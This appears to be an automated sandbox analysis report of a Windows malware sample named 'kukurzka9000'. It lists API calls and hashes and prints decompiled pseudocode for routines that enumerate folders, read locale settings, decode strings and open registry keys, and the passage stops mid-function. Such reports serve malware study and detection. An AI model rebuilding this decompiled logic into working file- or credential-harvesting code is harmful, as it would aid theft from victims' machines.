                                                                                                                                                                        0x004055a0
                                                                                                                                                                        0x004055a7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405338
                                                                                                                                                                        0x00405339
                                                                                                                                                                        0x004055ad
                                                                                                                                                                        0x004055b5
                                                                                                                                                                        0x004055b5

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$CloseFind
                                                                                                                                                                        • String ID: .$pXet
                                                                                                                                                                        • API String ID: 3269183270-4267161970
                                                                                                                                                                        • Opcode ID: 85117cb3117e62e14ba48f75263d130d3e59801c8bcbb9a650a8682f5d93ebc2
                                                                                                                                                                        • Instruction ID: 9add6ecd6c2ae3d530fb5184dfeb79ca83270308c151c7c4913ae962937730f4
                                                                                                                                                                        • Opcode Fuzzy Hash: 85117cb3117e62e14ba48f75263d130d3e59801c8bcbb9a650a8682f5d93ebc2
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C816CB1604301AFDB04DF61DD45E2B77A5EB88714F004D2DFA55A72E0DBB4E910CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401BA9
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00401C0D
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00401C7A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCombineFindFreeLocalPath
                                                                                                                                                                        • String ID: 8{@$pXet
                                                                                                                                                                        • API String ID: 2857355001-2685298059
                                                                                                                                                                        • Opcode ID: feaf2723ab089db3c6e73f9a78e146223a76f71caf34b501c7023f33917ed91e
                                                                                                                                                                        • Instruction ID: e4eb25170f48de3e52739dcc6529c8d0564bd3351774df583b1370a22c53c5e7
                                                                                                                                                                        • Opcode Fuzzy Hash: feaf2723ab089db3c6e73f9a78e146223a76f71caf34b501c7023f33917ed91e
                                                                                                                                                                        • Instruction Fuzzy Hash: 6741E871900214ABDB149B61DEC8FAA7778EB85300F004579F905B72A0EB79DE55CF68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                        			E00409064(void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				intOrPtr* _t19;
                                                                                                                                                                        
                                                                                                                                                                        				_t13 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				GetLocaleInfoW(GetUserDefaultLCID(), 0x1001, _t13, 0x104);
                                                                                                                                                                        				wsprintfW(_t17,  *0x40e47c, _t13);
                                                                                                                                                                        				_t19 = _a4;
                                                                                                                                                                        				 *_t19 = E0040A503( *_t19, _t17);
                                                                                                                                                                        				LocalFree(_t13);
                                                                                                                                                                        				LocalFree(_t17);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}






                                                                                                                                                                        0x0040907e
                                                                                                                                                                        0x0040908f
                                                                                                                                                                        0x004090a3
                                                                                                                                                                        0x004090ad
                                                                                                                                                                        0x004090b3
                                                                                                                                                                        0x004090c3
                                                                                                                                                                        0x004090c5
                                                                                                                                                                        0x004090cc
                                                                                                                                                                        0x004090d9

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,00409A50,00000000), ref: 0040909C
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00409A50,00000000,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090A3
                                                                                                                                                                        • wsprintfW.USER32 ref: 004090AD
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090C5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090CC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Locallstrlen$DefaultGlobalInfoLocaleUserwsprintf
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2247720945-1731603023
                                                                                                                                                                        • Opcode ID: 62d0f9841ec6e868d0d1d7cb96462110b985b39fb2cc8cbfcb7090088de899c8
                                                                                                                                                                        • Instruction ID: 624d8c4e8efa692e5b23cff9d3e49fd3310a2e312a93838384a0c37449368444
                                                                                                                                                                        • Opcode Fuzzy Hash: 62d0f9841ec6e868d0d1d7cb96462110b985b39fb2cc8cbfcb7090088de899c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 84F0C8B1200214BFF3005BA6AD89E6777ACEB48724F004435F748B7290CAB46C20866D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(0040687A,00000000), ref: 004064AB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 0040655B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406575
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004065CA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$BinaryByteCharCryptMultiStringWide
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 565018292-1731603023
                                                                                                                                                                        • Opcode ID: f99eeab593d43d46b53e483af27d95279f1ed3bfb06a039265a8d3998aacac8f
                                                                                                                                                                        • Instruction ID: ac64a0b193ce7f41f530b5697522d6c2b33bbf0bf2498a0822923da046ee8569
                                                                                                                                                                        • Opcode Fuzzy Hash: f99eeab593d43d46b53e483af27d95279f1ed3bfb06a039265a8d3998aacac8f
                                                                                                                                                                        • Instruction Fuzzy Hash: 93417A71A00215AFEB14CBA6DD81FBEBBF8EF88710F104429F605F7290D774A9118B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401A10
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00401A30
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00401A4E
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401AA4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CombinePath$CloseFindFreeLocal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2199340046-1731603023
                                                                                                                                                                        • Opcode ID: 8d4b454fa07d57e91eda3078c457a80832fe221a6e70e63dacd382864624ccd9
                                                                                                                                                                        • Instruction ID: 3d68e71345cd2aefdee3dd56593ad5adbe6c8fe38e95c290ac396d302c259ee2
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d4b454fa07d57e91eda3078c457a80832fe221a6e70e63dacd382864624ccd9
                                                                                                                                                                        • Instruction Fuzzy Hash: D2410571600214ABDB24EB55DD84FAB7378EB44300F00457AF905B32E0EB789E55CFA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 48%
                                                                                                                                                                        			E0040633E(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                        				char _v524;
                                                                                                                                                                        				char _v536;
                                                                                                                                                                        				char _v540;
                                                                                                                                                                        				char _v546;
                                                                                                                                                                        				char _v560;
                                                                                                                                                                        				char _v1084;
                                                                                                                                                                        				intOrPtr _v1092;
                                                                                                                                                                        				char _v1096;
                                                                                                                                                                        				short _v1100;
                                                                                                                                                                        				intOrPtr _v1120;
                                                                                                                                                                        				signed int _v1128;
                                                                                                                                                                        				char _v1132;
                                                                                                                                                                        				short* _v1156;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        				void* _t34;
                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                        				WCHAR* _t49;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        
                                                                                                                                                                        				_t76 = _a8;
                                                                                                                                                                        				_t49 = __ecx;
                                                                                                                                                                        				_v1120 = __edx;
                                                                                                                                                                        				if(_t76 > 2) {
                                                                                                                                                                        					L10:
                                                                                                                                                                        					_t25 = 1;
                                                                                                                                                                        					L11:
                                                                                                                                                                        					return _t25;
                                                                                                                                                                        				}
                                                                                                                                                                        				E004018E9( &_v524, 0x104, __ecx, __ecx);
                                                                                                                                                                        				E0040188C(__ecx,  &_v536, 0x104, _t76,  *0x40e1d0);
                                                                                                                                                                        				_t74 =  *((intOrPtr*)( *0x40e018))( &_v540,  &_v1132, __ecx);
                                                                                                                                                                        				if(_t74 != 0xffffffff) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						__eflags = _v1128 & 0x00000010;
                                                                                                                                                                        						if((_v1128 & 0x00000010) != 0) {
                                                                                                                                                                        							__eflags =  *((intOrPtr*)( *0x40e0a0))( &_v1084,  *0x40e394);
                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                        								_t34 = 0x2e;
                                                                                                                                                                        								__eflags = _t34 - _v1092;
                                                                                                                                                                        								if(_t34 != _v1092) {
                                                                                                                                                                        									_t36 =  *((intOrPtr*)( *0x40e08c))(_t49);
                                                                                                                                                                        									_t59 =  &_v546 + _t36 * 2;
                                                                                                                                                                        									_push( &_v546 + _t36 * 2);
                                                                                                                                                                        									E004018E9( &_v546 + _t36 * 2, 0x104, _t59,  &_v1096);
                                                                                                                                                                        									_t22 = _t76 + 1; // 0x407b87
                                                                                                                                                                        									E0040633E( &_v560, _v1156, _a4, _t22);
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								PathCombineW(_t78, _t49,  &_v1100);
                                                                                                                                                                        								E00406725(_t78, _v1156, __eflags, _a4);
                                                                                                                                                                        								__eflags = _t78;
                                                                                                                                                                        								if(_t78 != 0) {
                                                                                                                                                                        									LocalFree(_t78);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t76 = _a8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t31 =  *((intOrPtr*)( *0x40e148))(_t74,  &_v1128);
                                                                                                                                                                        						__eflags = _t31;
                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                        					FindClose(_t74);
                                                                                                                                                                        					goto L10;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t25 = 0;
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























                                                                                                                                                                        0x0040634c
                                                                                                                                                                        0x0040634f
                                                                                                                                                                        0x00406351
                                                                                                                                                                        0x00406359
                                                                                                                                                                        0x00406417
                                                                                                                                                                        0x00406417
                                                                                                                                                                        0x00406419
                                                                                                                                                                        0x0040641f
                                                                                                                                                                        0x0040641f
                                                                                                                                                                        0x00406370
                                                                                                                                                                        0x00406384
                                                                                                                                                                        0x0040639d
                                                                                                                                                                        0x004063a2
                                                                                                                                                                        0x004063a8
                                                                                                                                                                        0x004063a8
                                                                                                                                                                        0x004063ad
                                                                                                                                                                        0x004063c1
                                                                                                                                                                        0x004063c3
                                                                                                                                                                        0x00406422
                                                                                                                                                                        0x00406423
                                                                                                                                                                        0x00406428
                                                                                                                                                                        0x00406430
                                                                                                                                                                        0x0040643e
                                                                                                                                                                        0x00406441
                                                                                                                                                                        0x00406448
                                                                                                                                                                        0x00406451
                                                                                                                                                                        0x0040645f
                                                                                                                                                                        0x00406465
                                                                                                                                                                        0x004063c5
                                                                                                                                                                        0x004063d3
                                                                                                                                                                        0x004063dc
                                                                                                                                                                        0x004063eb
                                                                                                                                                                        0x004063f1
                                                                                                                                                                        0x004063f3
                                                                                                                                                                        0x004063f6
                                                                                                                                                                        0x004063f6
                                                                                                                                                                        0x004063fc
                                                                                                                                                                        0x004063fc
                                                                                                                                                                        0x004063c3
                                                                                                                                                                        0x0040640a
                                                                                                                                                                        0x0040640c
                                                                                                                                                                        0x0040640c
                                                                                                                                                                        0x00406411
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004063a4
                                                                                                                                                                        0x004063a4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004063a4

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 004063DC
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004063F6
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406411
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCombineFindFreeLocalPath
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2857355001-1731603023
                                                                                                                                                                        • Opcode ID: 1e8bcfac7fb21d89a1fd7e3e990eafe174fcc517af54ff1d10cd8ac6bdeb1a69
                                                                                                                                                                        • Instruction ID: a2e91296d065ef1b0a06dad1807512ccc5f2754619bc6de4979fdad6ab57a53e
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e8bcfac7fb21d89a1fd7e3e990eafe174fcc517af54ff1d10cd8ac6bdeb1a69
                                                                                                                                                                        • Instruction Fuzzy Hash: CE310272104316ABD714EB54DC80DBB73A8EB84314F00493EFD56A32E0DB79A919DBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCpyW.SHLWAPI(?,00000000), ref: 004017DB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004017E2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004017ED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 2826327444-1731603023
                                                                                                                                                                        • Opcode ID: 906ceeb5598f4a209837246c86dcb2ec7a27b24152454f0928d4476197fc89b4
                                                                                                                                                                        • Instruction ID: 0e35f1b792878b3a1d48bea3d62df56abb982cd26097e817133252b33d58790c
                                                                                                                                                                        • Opcode Fuzzy Hash: 906ceeb5598f4a209837246c86dcb2ec7a27b24152454f0928d4476197fc89b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 5D01DF72200115FBEB188BAAED84FAB77ACEF48350F000434F605F72A0DAB0DD1096B8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1178 4055b6-4055d2 1180 405b56-405b5a 1178->1180 1181 4055d8-4055d9 1178->1181 1182 4055da-40560a LocalAlloc 1181->1182 1185 405610-405625 call 40a3e4 1182->1185 1186 405b4d 1182->1186 1190 405b4a 1185->1190 1191 40562b-40565e LocalAlloc 1185->1191 1188 405b4e 1186->1188 1192 405b54-405b55 1188->1192 1190->1186 1195 405664-405679 call 40a3e4 1191->1195 1196 405b45-405b48 1191->1196 1192->1180 1200 405b42 1195->1200 1201 40567f-4056b2 LocalAlloc 1195->1201 1197 405ae5-405aeb 1196->1197 1197->1186 1200->1196 1205 405b34-405b40 1201->1205 1206 4056b8-4056cd call 40a3e4 1201->1206 1205->1197 1210 405b31 1206->1210 1211 4056d3-405706 RegOpenKeyExA LocalAlloc 1206->1211 1210->1205 1213 405b13-405b2f 1211->1213 1214 40570c-405721 call 40a3e4 1211->1214 1213->1188 1218 405b10 1214->1218 1219 405727-40575a LocalAlloc 1214->1219 1218->1213 1224 405af0-405b0e 1219->1224 1225 405760-405775 call 40a3e4 1219->1225 1224->1197 1229 40577b-4057ae LocalAlloc 1225->1229 1230 405aed 1225->1230 1235 4057b4-4057cc call 40a3e4 1229->1235 1236 405abe-405ae2 1229->1236 1230->1224 1235->1236 1240 4057d2-405809 LocalAlloc 1235->1240 1236->1197 1245 405a82-405ab9 1240->1245 1246 40580f-405824 call 40a3e4 1240->1246 1245->1188 1246->1245 1251 40582a-405864 LocalAlloc 1246->1251 1256 40586a-40587f LoadLibraryExA 1251->1256 1257 405a3d-405a7d 1251->1257 1259 405885-4058de call 405feb 1256->1259 1260 405a3a 1256->1260 1257->1188 1270 4058e4-405970 call 40a05f call 40a503 call 408619 1259->1270 1271 4059ce-405a2f 1259->1271 1260->1257 1295 405972-40598b 1270->1295 1296 4059ab-4059cb 1270->1296 1271->1182 1303 405a35 1271->1303 1295->1296 1300 40598d-4059a8 call 407edb 1295->1300 1296->1271 1300->1296 1303->1192
                                                                                                                                                                        C-Code - Quality: 34%
                                                                                                                                                                        			E004055B6(intOrPtr __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				char _v64;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				void* _t131;
                                                                                                                                                                        				void* _t138;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				void* _t156;
                                                                                                                                                                        				void* _t162;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				void* _t181;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				void* _t209;
                                                                                                                                                                        				void* _t210;
                                                                                                                                                                        				void* _t211;
                                                                                                                                                                        				void* _t212;
                                                                                                                                                                        				void* _t213;
                                                                                                                                                                        				void* _t214;
                                                                                                                                                                        				void* _t226;
                                                                                                                                                                        				void* _t228;
                                                                                                                                                                        				void* _t229;
                                                                                                                                                                        				void* _t230;
                                                                                                                                                                        				char _t274;
                                                                                                                                                                        				void* _t289;
                                                                                                                                                                        				void* _t291;
                                                                                                                                                                        				void* _t295;
                                                                                                                                                                        				void* _t296;
                                                                                                                                                                        				void* _t298;
                                                                                                                                                                        				void* _t300;
                                                                                                                                                                        				void* _t302;
                                                                                                                                                                        				void* _t304;
                                                                                                                                                                        				void* _t306;
                                                                                                                                                                        				void* _t308;
                                                                                                                                                                        				int _t309;
                                                                                                                                                                        				void* _t311;
                                                                                                                                                                        				void* _t314;
                                                                                                                                                                        				signed int _t317;
                                                                                                                                                                        				void* _t319;
                                                                                                                                                                        				signed int _t321;
                                                                                                                                                                        				void* _t323;
                                                                                                                                                                        				signed int _t325;
                                                                                                                                                                        				void* _t327;
                                                                                                                                                                        				signed int _t329;
                                                                                                                                                                        				void* _t331;
                                                                                                                                                                        				signed int _t333;
                                                                                                                                                                        				void* _t335;
                                                                                                                                                                        				signed int _t337;
                                                                                                                                                                        				void* _t339;
                                                                                                                                                                        				signed int _t341;
                                                                                                                                                                        				void* _t344;
                                                                                                                                                                        				void* _t345;
                                                                                                                                                                        				void* _t347;
                                                                                                                                                                        				void* _t348;
                                                                                                                                                                        
                                                                                                                                                                        				_v56 = __edx;
                                                                                                                                                                        				_t295 =  *((intOrPtr*)( *0x40e18c))(_t230,  *0x40e250);
                                                                                                                                                                        				if(_t295 == 0) {
                                                                                                                                                                        					L42:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t296 = _t295 + 0xa;
                                                                                                                                                                        					_t117 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t296) + _t115);
                                                                                                                                                                        					_t226 = _t117;
                                                                                                                                                                        					_v8 = _t226;
                                                                                                                                                                        					_t314 =  *((intOrPtr*)( *0x40e18c))(_t296,  *0x40e1f0);
                                                                                                                                                                        					if(_t314 == 0) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t317 = _t314 - _t296 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t296,  &_v8, 0, _t317) == 0) {
                                                                                                                                                                        						_t226 = _v8;
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t298 = _t296 + _t317 * 2 + 2;
                                                                                                                                                                        					_t124 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t298) + _t122);
                                                                                                                                                                        					_t226 = _t124;
                                                                                                                                                                        					_v12 = _t226;
                                                                                                                                                                        					_t319 =  *((intOrPtr*)( *0x40e18c))(_t298,  *0x40e20c);
                                                                                                                                                                        					if(_t319 == 0) {
                                                                                                                                                                        						L37:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						L29:
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t321 = _t319 - _t298 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t298,  &_v12, 0, _t321) == 0) {
                                                                                                                                                                        						_t226 = _v12;
                                                                                                                                                                        						goto L37;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t300 = _t298 + _t321 * 2 + 2;
                                                                                                                                                                        					_t131 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t300) + _t129);
                                                                                                                                                                        					_t226 = _t131;
                                                                                                                                                                        					_v16 = _t226;
                                                                                                                                                                        					_t323 =  *((intOrPtr*)( *0x40e18c))(_t300,  *0x40e20c);
                                                                                                                                                                        					if(_t323 == 0) {
                                                                                                                                                                        						L35:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						goto L29;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t325 = _t323 - _t300 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t300,  &_v16, 0, _t325) == 0) {
                                                                                                                                                                        						_t226 = _v16;
                                                                                                                                                                        						goto L35;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t302 = _t300 + _t325 * 2 + 2;
                                                                                                                                                                        					_t138 = LocalAlloc(0x40, RegOpenKeyExA(_t302, ??, ??, ??, ??) + _t136);
                                                                                                                                                                        					_t228 = _t138;
                                                                                                                                                                        					_v20 = _t228;
                                                                                                                                                                        					_t327 =  *((intOrPtr*)( *0x40e18c))(_t302,  *0x40e20c);
                                                                                                                                                                        					if(_t327 == 0) {
                                                                                                                                                                        						L33:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_t228);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						L40:
                                                                                                                                                                        						L41:
                                                                                                                                                                        						goto L42;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t329 = _t327 - _t302 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t302,  &_v20, 0, _t329) == 0) {
                                                                                                                                                                        						_t228 = _v20;
                                                                                                                                                                        						goto L33;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t304 = _t302 + _t329 * 2 + 2;
                                                                                                                                                                        					_t147 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t304) + _t145);
                                                                                                                                                                        					_t226 = _t147;
                                                                                                                                                                        					_v24 = _t226;
                                                                                                                                                                        					_t331 =  *((intOrPtr*)( *0x40e18c))(_t304,  *0x40e20c);
                                                                                                                                                                        					if(_t331 == 0) {
                                                                                                                                                                        						L31:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						goto L29;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t333 = _t331 - _t304 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t304,  &_v24, 0, _t333) == 0) {
                                                                                                                                                                        						_t226 = _v24;
                                                                                                                                                                        						goto L31;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t306 = _t304 + _t333 * 2 + 2;
                                                                                                                                                                        					_t156 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t306) + _t154);
                                                                                                                                                                        					_t226 = _t156;
                                                                                                                                                                        					_v32 = _t226;
                                                                                                                                                                        					_t335 =  *((intOrPtr*)( *0x40e18c))(_t306,  *0x40e20c);
                                                                                                                                                                        					if(_t335 == 0) {
                                                                                                                                                                        						L28:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						LocalFree(_v24);
                                                                                                                                                                        						goto L29;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t337 = _t335 - _t306 >> 1;
                                                                                                                                                                        					_t162 = E0040A3E4(_t306,  &_v32, 0, _t337);
                                                                                                                                                                        					_t226 = _v32;
                                                                                                                                                                        					if(_t162 == 0) {
                                                                                                                                                                        						goto L28;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t308 = _t306 + _t337 * 2 + 2;
                                                                                                                                                                        					_v44 =  *_t226 & 0x0000ffff;
